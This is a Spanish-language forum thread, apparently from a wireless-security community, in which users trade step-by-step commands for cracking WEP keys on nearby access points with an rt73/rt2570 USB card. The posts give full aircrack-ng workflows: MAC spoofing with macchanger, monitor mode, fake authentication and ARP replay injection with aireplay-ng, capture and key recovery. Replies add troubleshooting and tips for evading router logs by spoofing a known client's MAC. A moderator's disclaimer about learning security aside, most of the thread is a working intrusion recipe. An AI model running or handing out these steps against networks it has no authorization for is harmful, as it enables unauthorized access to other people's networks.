hadrianweb
Aleph-0
Moderador Global
 Desconectado
Mensajes: 3508
|
 |
« en: 20-Febrero 23:58:17 (Martes) » |
|
Lo primero que debemos hacer es un iwconfig para saber si no detecta el chip rt73 o rt2570, bueno si al lado de rausb0 no pone rt73 hacemos lo siguiente: ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
Si si por el contrario no nos detecta el rt73 a estas lineas le añadimos: rmmod rt73
rmmod rt2570
modprobe rt73
Para finalizar la configuracion de la tarjeta hacemos lo siguiente: ifconfig rausb0 up
iwconfig rausb0 mode monitor
Con esto hecho podemos empezar a utilizar los programas especificos. Hacemos lo siguiente: airodump-ng rausb0
Con esto comprobamos cual es el canal de ap a atacar y tambien el bssid luego abrimos otra terminal y con el aireplay-ng hacemos de la siguiente forma: aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0
Y en otra terminal distinta hacemos lo siguiente: aireplay-ng -3 -b mac_del_ap -h 00:11:22:33:44:55 rausb0
Para finalizar en una terminal abrimos el airodump-ng de la siguinte forma: airodump-ng -c canal_ap -w nombre_archivo rausb0 Con esto lo que nos queda es esprar a que el aireplay-ng coja el arp. Para finalizar lo que tenemos que hacer es aircrack-ng -z archivo.cap rausb0 Y Ya esta  |
|
|
|
« Última modificación: 09-Marzo 10:18:13 (Domingo) por hadrianweb »
|
En línea
|
|
|
|
|
|
djdava
Desconectado
Mensajes: 27
|
|
« Respuesta #2 en: 25-Abril 14:25:00 (Mircoles) » |
|
Hola, pues me surge un problema al utilizar los comandos que pone hadrianweb en el mini manual para las rt73. Lo que hago es exactamente lo que pone en ese manual, es decir pongo la rt73 en modo monito, en el mismo canal y con el essid del AP de esta forma: iwconfig rausb0 mode monitor channel 11 essid default Despues enxufo el airodump-ng en el canal 11, hago el ataque 1 y despues el ataque 3 igual como pone en el manual y me sale un error, diciendome que no estoy associado al AP y no me suben los data. He probado un monton de cosas y no se ke mas hacer. Os dejo una captura de lo que me pasa, a ver si me podeis ayudar. P.D: para hacer el atake 1 me cambio la MAC, por la de un cliente que se suele conectar al AP.  Saludos!! |
|
|
|
|
En línea
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
hadrianweb
Aleph-0
Moderador Global
Desconectado
Mensajes: 3508
|
|
« Respuesta #17 en: 21-Mayo 01:01:48 (Lunes) » |
|
Jeje, mira esto rate/bit[rate]
For cards supporting multiple bit rates, set the bit-rate in b/s. The
bit-rate is the speed at which bits are transmitted over the medium, the user speed of the link is lower due to medium sharing and overhead.
You must append the suffix k, M or G to the value (decimal multiplier : 10^3, 10^6 and 10^9 b/s), or add enough '0'. Values below 1000 are card specific, usually an index in the bit-rate list. Use auto to select the automatic bit-rate mode (fallback to lower rate on noisy channels), which is the default for most cards, and fixed to revert back to fixed setting. If you specify a bit-rate value and append auto, the driver will use all bit lower and equal than this value.
Examples :
iwconfig eth0 rate 11M
iwconfig eth0 rate auto
iwconfig eth0 rate 5.5M auto Si quieres te lo traduzco pero no creo que sea necesario |
|
|
|
|
En línea
|
|
|
|
adrian_oca
Desconectado
Mensajes: 6
|
|
« Respuesta #18 en: 14-Junio 01:29:13 (Jueves) » |
|
En primer luego deberias bajar el rate, es decir iwconfig rausb0 rate 1M Si el error continua es probable que sea por que te encuentres muy lejos del ap Perdón por no haberme presentado antes, yo tengo el mismo problema que tratan aquí, bajo muchos paquetes pero casi nada de datos ni ARP, voy a intentar esto y luego les comento. mi problema es este: Este fin de semana pasado se me presentó un problema que no había visto, ya cuando lanzaba el ataque con el WIFISLAX si me capturaba un muchos paquetes pero muy pocos IV´s o datos, las peticiones ARP también eran muy pocas, por ejemplo: Los paquetes ya sumaban alrededor de 600,000 y los IV´s eran como 200 y las ARP eran como 40... y eso que me pasé como dos horas ahí mondadeando... Ya he estado leyendo y según esto puede ser por 4 razones: 1.-Te encuentras demasiado lejos del punto de acceso.
2.-No hay tráfico en la red escogida.
3.-Hay tráfico de tipo G pero estás capturando en modo B.
4.-Hay algún problema con tu tarjeta (¿problema de firmware ?) Quizá pueda ser por la distancia, pregunta: ¿Puede ser esto posible aunque reciba 45% de señal del AP? Después seguí leyendo y se me hace más real esto: Algunos puntos de acceso requieren de reautentificación cada 30 segundos, si no nuestro cliente falso será considerado desconectado. En este caso utiliza el retardo de re-asociación periódica: aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 ath0Si este fuese mi problema y ya que yo uso el controlador rt2570 (Ralink b/g USB) al momento de darlo "de alta" lo identifico como "rausb0", pregunta: ¿En la sentencia aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 ath0 es correcto terminar con "ath0" o le pongo "rausb0"? Agradezco a todos de antemano, espero y me puedan resolver mi duda... |
|
|
|
|
En línea
|
|
|
|
|
|
adrian_oca
Desconectado
Mensajes: 6
|
|
« Respuesta #20 en: 15-Junio 00:33:51 (Viernes) » |
|
hola te respondo rapidamente.. tu interfase es usb osea esta identificada como rasub0... el comando que tienes que poner es aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 rausb0ceo que te respondias solito.. pero por si las dudas.. saludos  Gracias Lagartija esa duda es la que tenía y no la he puesto en prueba porque sólo tengo oportunidad de dedicarle tiempo a eso el fin de semana, ya sabes el trabajo... si sonaba algo lógico pero quería estar seguro que era así... y sobre mi problema principal de no obtener Datos, crees que con eso se resuelva??? Gracias de antemano |
|
|
|
|
En línea
|
|
|
|
lagartija
Desconectado
Sexo: 
Mensajes: 20
|
|
« Respuesta #21 en: 15-Junio 07:29:36 (Viernes) » |
|
Adrian_oca--. Bueno te respondo como yo lo solucione.. Va es una sugerencia.. Aunque por estos foros no esta bien visto.. pero no importa mucho .. si e vez de poner una MAC falsa a tu tarjeta, utilizas la MAC verdadera... seguramente se te soluciona.. lo que dicen en los foros es que uno no debe utilizar la MAC verdadera.. pero en realidad creo yo que no hay mucho problema... piénsalo.. y intenta por si las dudas te doy mas pistas. ósea te doy todos los comandos.. no tiene sentido que te pongas investigar y que nadie te responda clara mente.. rmmod rt73 rmmod rt2570 modprobe rt73 ifconfig rausb0 up iwconfig rausb0 mode monitor airodump-ng rausb0 aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h "MACVERDADERA" rausb0 aireplay-ng -3 -b mac_del_ap -h "MAC VERDADERA" rausb0 airodump-ng -c canal_ap --ivs rausb0 aircrack-ng archivo.ivs rausb0 SOLO tome cosas que han hecho compañeros y le puse "MAC verdadera" donde deberías poner el numero.. si no sabes como leerlo.. es muy fácil da vuelta tu usb.. y ahí leerás el numero.. casi todas lo tienen.. acuérdate que tienen que ser 10 caracteres mayormente letras acompañados por números.. si tienes problemas pregunta y te ayudo.. bueno espero que te sirva.. : : lagartija |
|
|
|
|
En línea
|
|
|
|
|
|
the_often
Moderador
Desconectado
Mensajes: 698
|
|
« Respuesta #23 en: 15-Junio 10:15:24 (Viernes) » |
|
Confirmo que es totalmente cierto lo que dice lagartija sobre la MAC verdadera. Porque logicamente, el cliente falso lo podemos crear con cualquier MAC, incluso con la nuestra real sin cambiarla.Y a veces hasta funciona mejor si no la cambiamos, o si la cambiamos por una que MAC que 'tenga sentido', porque me he encontrado con APs que conceden asociacion mucho mas facilmente a MACs que puedan existir que a MACs del tipo 00:11:22:33:44:55. y si lo hacemos con la MAC de un cliente que ya haya estado ALGUNA VEZ asociado a ese router pues mejor aun. Pero supongo que la razon de cambiar la MAC es por 'seguridad', para evitar quedar loggeados con nuestra MAC REAL en el router atacado. Saludos! P.D: Por cierto, por curiosidad como es que este manual tan util sobre el rt73 está en electronica de antenas?? Hay copia puesta en algun otro sitio?? Lo digo por que igual sí que la hay y no la vi  |
|
|
|
« Última modificación: 15-Junio 10:22:07 (Viernes) por the_often »
|
En línea
|
El cura en misa: "...y dijo Jesús: 'Lázaro, levantate y anda'. Y entonces Lázaro se levantó y andó..."
Y un feligrés le interrumpe: "¡¡ <b>ANDUVO,</b> ATONTAO !!"
El cura continua: "Esto..., bueno sí,.. al principio anduvo un poco atontao..., pero luego andó....."
Jejejeje!
|
|
|
adrian_oca
Desconectado
Mensajes: 6
|
|
« Respuesta #24 en: 16-Junio 01:57:31 (Sbado) » |
|
a ver... aver... vamos a ponernos de acuerdo, creo que se me pasaron algunos detalles que deberían de saber... lo primero que hago con el wifislax (el anterior a la versión 2.0) es esto, abro una hoja y ahí escribo lo siguiente: ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
rmmod rt73
rmmod rt2570
modprobe rt73
ifconfig rausb0 up
iwconfig rausb0 mode monitordespués lanzo el airoscript tal como se muestra en este video: http://personal.telefonica.terra.es/web/cod2/wifislax/ataque1.htmYa una vez hice ese procedimiento y me funcionó, tal como lo expongo, pero en esta ocasión sigo la receta al pie de la letra y no acumulo datos... Ustedes creen que usando la sentencia aireplay -1 30 -e "el ssid" -a "el BSSID" -h 00:11:22:33:44:55 rausb0 se solucione? Gracias de antemano |
|
|
|
|
En línea
|
|
|
|
ChimoC
Moderador Global
Desconectado
Mensajes: 3561
|
|
« Respuesta #25 en: 16-Junio 13:52:21 (Sbado) » |
|
Hola adrian_oca: La "sentencia" (como me suena esa palabreja  ) que has puesto es para hacer un A1 esto es una asociación falsa... luego debes hacer un A3 que sirva para que los DATAS te suban esto es la inyección aireplay-ng -3 -b MAC AP -h MAC CLIENTE FALSO rausb0 -x 1024 Si fuera cliente legítimo... lo mismo pero cambias el MAC FALSO por el MAC REAL.... Un saludo ChimoC |
|
|
|
|
En línea
|
|
|
|
adrian_oca
Desconectado
Mensajes: 6
|
|
« Respuesta #26 en: 16-Junio 17:14:58 (Sbado) » |
|
Hola adrian_oca: La "sentencia" (como me suena esa palabreja ) que has puesto es para hacer un A1 esto es una asociación falsa... luego debes hacer un A3 que sirva para que los DATAS te suban esto es la inyección aireplay-ng -3 -b MAC AP -h MAC CLIENTE FALSO rausb0 -x 1024 Si fuera cliente legítimo... lo mismo pero cambias el MAC FALSO por el MAC REAL.... Un saludo ChimoC Hola ChimoC, No les he contado pero yo soy de Monterrey México, está ciudad esta hacia al norte del país y está muy cerca a la frontera texana entonces ya te imaginarás las costumbres, de hecho acá es muy común que la gente use sombrero a diario (o gorras no sé como los coonozcan ustedes, son los que usan los vaqueros) como los que usamos en este foro en los emoticons... Según me acuerdo en primeros cursos de programación Sentencia se aplicaba a un enunciado, me tardo aproximadamente media hora en publicar un post ya que cuido mucho mis palabras para que me puedan entender y mira aún así se me escapan muchas.. bueno volvamos al tema... Por lo que me dice ChimoC puedo entender que ya no necesito seguir los pasos del video y que lo tengo que hacer todo de modo manual, si esto fuese correcto hasta aquí entiendo lo siguiente: ifconfig rausb0 down
macchanger -m 00:11:22:33:44:55 rausb0
rmmod rt73
rmmod rt2570
modprobe rt73
ifconfig rausb0 up
iwconfig rausb0 mode monitor
airodump-ng rausb0
aireplay-ng -1 30 -e Nombre_del_ap -a mac_del_ap -h 00:11:22:33:44:55 rausb0y la siguiente línea sería la que me recomienda ChimoC aireplay-ng -3 -b MAC AP -h MAC CLIENTE FALSO rausb0 -x 1024airodump-ng -c canal_ap --ivs rausb0y ya cuando tenga suficientes Datos lanzo el aircrack aircrack-ng archivo.ivs rausb0Pregunta, al escribir aircrack-ng archivo.ivs rausb0 en una terminal nueva, por default llama al archivo donde se encuentran los Datos??? Ya sé que son muchas preguntas y que más de uno se harta, soy un novato y sé que a veces es fastidioso andar contestando cosas que para muchos pueden ser hasta aburridas, por eso agradezco mucho al que se toma la molestia en leer y contestar Utilizo el LiveCD entonces no puedo hacer capturas, hoy lo voy a intentar de nuevo y si algo se me dificulta tomaré una foto al monitor de la PC y se las comparto, pero espero que ya con esto se resuelva mi problema. Gracias a todos |
|
|
|
|
En línea
|
|
|
|
ChimoC
Moderador Global
Desconectado
Mensajes: 3561
|
|
« Respuesta #27 en: 17-Junio 11:36:16 (Domingo) » |
|
Hola adrian_oca: Te digo paso a paso..... ok? Pero recuerda que este foro es para tratar sobre la inseguridad de redes... no para crackearlas....o reventarlas... sino para aprender a ver los fallos y mejorarr tu seguridad  No hace falta que utilices (si no quieres) la sentencia de rmmod, si te das cuenta, en la versión de Wifislax 2.0 (ahora ya está la 3.0) te viene un lanzador que lo hace por tí.... asisitencia de chipset----------------> chipset ralink--------> forzar rt73 sobre rt2570. Los diferentes ataques (A1, A3...) y el escaneo (airodump) los debes realizar en ventanas o shells diferentes. Los dos ataques A1 y A3 son correctos, pero debes recordar que el A3 sobre el A1 a vece starda en funcionar y otras veces simplemente no funciona (protección de los AP contra el A1) El airodump lo estás utilizando guardando IVS (ocupa mernos que los CAPs) pero tienes el inconveniente que no podrías utilizar el aircrack-ptw ...que sirve para desencriptar la clave WEP con unos 50000 datas (formato CAP) airodump INTERFACE pruebas CANAL 0 (ejemplo: airodump ath0 pruebas 5 0 le estoy diciendo que me escanee el canal 5 y me guarde en formato CAP...... si el 0 lo cambio por un 1..... formato IVS) airodump-ng -w prueba -c 5 ath0 (le estoy diciendo que me guarde en formato CAP y me escanee el canal 5) airodump-ng --ivs -w prueba -c 5 ath0 (lo mismo pero que me guarde en IVS) Y para el aircrack-ng escribes aircrack-ng FICHERO CAPTURAS.ivs o cap o bien aircrack-ng *.cap y ya lo eliges Mira una chincheta que te habla del aircrack-ptw y si tienes alguna pregunta no dudes en venir a esta tu casa Creo que no se me ha olvidado nada (mmmm.... ayer un poquito de fiesta y me cabeza está algo cansada) Saludos ChimoC P.D.: En cuanto al tema de las MACs (en el A1) .... hubo cierta discusión en algún foro..... MAC FALSA INVENTADA: Una dirección MAC es algo similar a: 00:09:5B:AC:BB:F2. La primera mitad (00:09:5B) de la dirección MAC se refiere al fabricante. La segunda mitad (AC:BB:F2) es única para cada aparato. Algunos puntos de acceso ignorarán direcciones MAC inválidas. Por lo tanto asegúrate de usar una dirección de un fabricante wireless válido cuando decidas cambiar la MAC. En otro caso los paquetes serán ignorados. |
|
|
|
|
En línea
|
|
|
|
|
|
|
|
|
|
askatuak
Desconectado
Mensajes: 25
|
|
« Respuesta #31 en: 20-Junio 20:15:18 (Mircoles) » |
|
| | |
Autor